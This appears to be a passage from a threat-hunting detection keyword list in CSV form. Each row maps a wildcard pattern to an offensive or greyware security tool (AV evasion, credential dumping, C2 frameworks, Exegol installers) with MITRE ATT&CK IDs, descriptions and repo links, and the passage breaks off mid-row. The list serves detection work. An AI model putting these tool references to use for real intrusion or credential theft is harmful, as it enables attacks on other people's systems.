AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*input/shellcode_raw.txt*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*ins1gn1a/Frampton*,offensive_tool_keyword,frampton,PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible,T1055 - T1548.002 - T1129 - T1001,TA0002 - TA0003- TA0004 -TA0011,N/A,N/A,POST Exploitation tools,https://github.com/ins1gn1a/Frampton,1,1,N/A,N/A,1,69,16,2019-11-24T22:34:48Z,2019-10-29T00:22:14Z -*InsecurePowerShell*,offensive_tool_keyword,InsecurePowerShell,powershell without securities features,T1059 - T1086 - T1117,TA0002 - TA0003 - TA0040,N/A,N/A,Defense Evasion,https://github.com/cobbr/InsecurePowerShell,1,0,N/A,N/A,1,98,18,2017-12-19T03:40:33Z,2017-12-17T02:16:21Z -*insecurityofthings*jackit*,offensive_tool_keyword,jackit,This is a partial implementation of Bastilles MouseJack exploit. See mousejack.com for more details. Full credit goes to Bastilles team for discovering this issue and writing the libraries to work with the CrazyRadio PA dongle. Also. thanks to Samy Kamkar for KeySweeper. to Thorsten Schroeder and Max Moser for their work on KeyKeriki and to Travis Goodspeed. We stand on the shoulders of giants.,T1210 - T1212 - T1560 - T1562,TA0002 - TA0009,N/A,N/A,Exploitation tools,https://github.com/insecurityofthings/jackit,1,0,N/A,N/A,8,756,138,2020-10-01T04:37:00Z,2016-07-01T23:21:56Z -*insert_top_100_passwords_1_G*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*InsidePro-PasswordsPro.rule*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*InspectAssembly.csproj*,offensive_tool_keyword,InspectAssembly,"Inspect's a target .NET assembly's CIL for calls to deserializers and .NET remoting usage to aid in triaging potential privilege escalations. ",T1055.012 - T1027 - T1112,TA0005 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/matterpreter/OffensiveCSharp/tree/master/InspectAssembly,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*InspectAssembly.exe*,offensive_tool_keyword,InspectAssembly,"Inspect's a target .NET assembly's CIL for calls to deserializers and .NET remoting usage to aid in triaging potential privilege escalations. ",T1055.012 - T1027 - T1112,TA0005 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/matterpreter/OffensiveCSharp/tree/master/InspectAssembly,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*install powershell-empire*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*install * roadrecon*,offensive_tool_keyword,ROADtools,A collection of Azure AD tools for offensive and defensive security purposes,T1136.003 - T1078.004 - T1021.006 - T1003.003,TA0002 - TA0004 - TA0005 - TA0006,N/A,N/A,Network Exploitation tools,https://github.com/dirkjanm/ROADtools,1,1,N/A,N/A,10,1353,206,2023-09-27T08:30:55Z,2020-03-28T09:56:08Z -*install amass,offensive_tool_keyword,Amass,In-depth subdomain enumeration tool that performs scraping. recursive brute forcing06/01/2021 crawling of web archives06/01/2021 name altering and reverse DNS sweeping,T1593 - T1594 - T1595 - T1567 - T1569,TA0007 - TA0009 - TA0004 - TA0005 - TA0011,N/A,N/A,Information Gathering,https://github.com/OWASP/Amass,1,0,N/A,N/A,10,10153,1759,2023-09-19T11:29:11Z,2018-07-10T16:05:08Z -*install bloodhound*,offensive_tool_keyword,bloodhound,A Python based ingestor for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/fox-it/BloodHound.py,1,0,N/A,10,10,1538,268,2023-09-27T07:56:12Z,2018-02-26T14:44:20Z -*install c2tc-domaininfo*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*install cdn-proxy*,offensive_tool_keyword,cdn-proxy,cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.,T1100 - T1090 - T1105 - T1133 - T1190,TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/RyanJarv/cdn-proxy,1,0,N/A,N/A,3,213,25,2022-08-25T00:40:25Z,2022-03-07T21:11:07Z -*install certsync*,offensive_tool_keyword,certsync,Dump NTDS with golden certificates and UnPAC the hash,T1553.002 - T1003.001 - T1145,TA0002 - TA0003 - TA0006,N/A,N/A,Credential Access,https://github.com/zblurx/certsync,1,0,N/A,N/A,6,566,65,2023-07-25T15:22:06Z,2023-01-31T15:37:12Z -*install coercer*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,0,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -*--install -d kali-linux*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,0,wsl installation,N/A,N/A,N/A,N/A,N/A,N/A -*install dploot*,offensive_tool_keyword,dploot,DPAPI looting remotely in Python,T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,Credential Access,https://github.com/zblurx/dploot,1,0,N/A,10,3,279,23,2023-09-30T11:10:26Z,2022-05-24T11:05:21Z -*install gobuster*,offensive_tool_keyword,gobuster,Directory/File DNS and VHost busting tool written in Go,T1595 - T1133 - T1110 - T1027 - T1132 - T1048,TA0010 - TA0001 - TA0006 - TA0005 - TA0011,N/A,N/A,Network Exploitation Tools,https://github.com/OJ/gobuster,1,0,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z -*install h8mail*,offensive_tool_keyword,h8mail,Powerful and user-friendly password hunting tool.,T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001,TA0010,N/A,N/A,Information Gathering,https://github.com/opencubicles/h8mail,1,0,N/A,N/A,1,9,5,2019-08-19T09:46:33Z,2019-08-19T09:45:32Z -*install hakrawler*,offensive_tool_keyword,hakrawler,Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application,T1190 - T1212 - T1087.001,TA0007 - TA0003 - TA0009,N/A,N/A,Web Attacks,https://github.com/hakluke/hakrawler,1,0,N/A,6,10,3967,458,2023-07-22T19:39:11Z,2019-12-15T13:54:43Z -*install hping3*,offensive_tool_keyword,hping,hping3 is a network tool able to send custom TCP/IP,T1046 - T1190 - T1200,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://github.com/antirez/hping,1,0,N/A,N/A,10,1296,326,2022-10-04T12:14:24Z,2012-06-13T17:41:54Z -*install hydra-gtk*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,0,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*install impacket*,offensive_tool_keyword,cobaltstrike,Fileless lateral movement tool that relies on ChangeServiceConfigA to run command,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Mr-Un1k0d3r/SCShell,1,0,N/A,10,10,1241,228,2023-07-10T01:31:54Z,2019-11-13T23:39:27Z -*install Jira-Lens*,offensive_tool_keyword,Jira-Lens,Fast and customizable vulnerability scanner For JIRA written in Python,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/MayankPandey01/Jira-Lens,1,0,N/A,N/A,3,206,31,2022-08-23T09:57:52Z,2021-11-14T18:37:47Z -*install macchanger*,offensive_tool_keyword,Rudrastra,Make a Fake wireless access point aka Evil Twin,T1491 - T1090.004 - T1557.001,TA0040 - TA0011 - TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/SxNade/Rudrastra,1,0,N/A,8,1,46,21,2023-04-22T15:10:42Z,2020-11-05T09:38:15Z -*install p0f*,offensive_tool_keyword,p0f,P0f is a tool that utilizes an array of sophisticated purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications,T1046 - T1040,TA0007 - TA0010,N/A,N/A,Sniffing & Spoofing,https://www.kali.org/tools/p0f/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*install pivotnacci*,offensive_tool_keyword,pivotnacci,A tool to make socks connections through HTTP agents,T1090 - T1090.003,TA0003 - TA0011,N/A,N/A,C2 - Persistence,https://github.com/blackarrowsec/pivotnacci,1,0,N/A,9,10,614,111,2021-03-30T14:37:25Z,2020-04-28T11:36:45Z -*install proxychains*,offensive_tool_keyword,proxychains,proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy,T1090.004 - T1090.003 - T1027,TA0001 - TA0006 - TA0040,N/A,N/A,Exploitation tools,https://github.com/haad/proxychains,1,0,N/A,N/A,10,5489,586,2023-04-05T10:32:16Z,2011-02-25T12:27:05Z -*install pyinstaller*,greyware_tool_keyword,pyinstaller,PyInstaller bundles a Python application and all its dependencies into a single package executable.,T1564.004 - T1027.001 - T1059.006,TA0002 - TA0003 - TA0005,N/A,N/A,Execution,https://www.pyinstaller.org/,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*install pypykatz*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*install s3scanner*,offensive_tool_keyword,S3Scanner,Scan for open S3 buckets and dump the contents,T1583 - T1583.002 - T1114 - T1114.002,TA0010,N/A,N/A,Reconnaissance,https://github.com/sa7mon/S3Scanner,1,0,N/A,8,10,2221,366,2023-10-02T13:25:28Z,2017-06-19T22:14:21Z -*install samdump2*,offensive_tool_keyword,samdump2,Retrieves syskey and extract hashes from Windows 2k/NT/XP/Vista SAM.,T1003.002 - T1564.001,TA0006 - TA0010,N/A,N/A,Credential Access,https://salsa.debian.org/pkg-security-team/samdump2,1,0,N/A,10,6,N/A,N/A,N/A,N/A -*install smbmap*,offensive_tool_keyword,smbmap,SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.,T1210.001 - T1083 - T1213 - T1021,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Information Gathering,https://github.com/ShawnDEvans/smbmap,1,0,N/A,10,10,1554,344,2023-09-14T20:51:52Z,2015-03-16T13:15:00Z -*install smbmap*,offensive_tool_keyword,smbmap,SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.,T1210.001 - T1083 - T1213 - T1021,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Information Gathering,https://github.com/ShawnDEvans/smbmap,1,0,N/A,10,10,1554,344,2023-09-14T20:51:52Z,2015-03-16T13:15:00Z -*install snmpcheck*,greyware_tool_keyword,snmpcheck,automate the process of gathering information of any devices with SNMP protocol support. like snmpwalk - snmpcheck allows you to enumerate the SNMP devices and places the output in a very human readable friendly format. It could be useful for penetration testing or systems monitoring,T1046 - T1018,TA0007 - TA0005,N/A,N/A,Reconnaissance,http://www.nothink.org/codes/snmpcheck/index.php,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*install tor deb.torproject.org-keyring*,offensive_tool_keyword,torproject,Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.,T1090 - T1134 - T1188 - T1307 - T1497 - T1560,TA0001 - TA0002 - TA0005 - TA0011,N/A,N/A,Data Exfiltration,torproject.org,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*install tshark*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*install udmp_parser*,offensive_tool_keyword,udmp-parser,A Cross-Platform C++ parser library for Windows user minidumps.,T1005 - T1059.003 - T1027.002,TA0009 - TA0005 - TA0040,N/A,N/A,Credential Access,https://github.com/0vercl0k/udmp-parser,1,0,N/A,6,2,160,22,2023-08-27T18:30:24Z,2022-01-30T18:56:21Z -*install wapiti*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,0,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*install_aclpwn*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_ad_apt_tools*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_adidnsdump*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_amber*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_bloodhound*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_bloodhound-import*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_bloodhound-py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_bloodhound-quickwin*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_certipy*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_certsync*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_coercer*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_crackhound*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_cracking_apt_tools*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_crackmapexec*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_cypheroth*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_darkarmour*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_dfscoerce*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_donpapi*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_enum4linux-ng*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_enyx*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_evilwinrm*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_finduncommonshares*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_gmsadumper*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_goldencopy*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_gosecretsdump*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_gpp-decrypt*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_hashonymize*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_impacket*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_keepwn*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_kerbrute*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_krbrelayx*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - 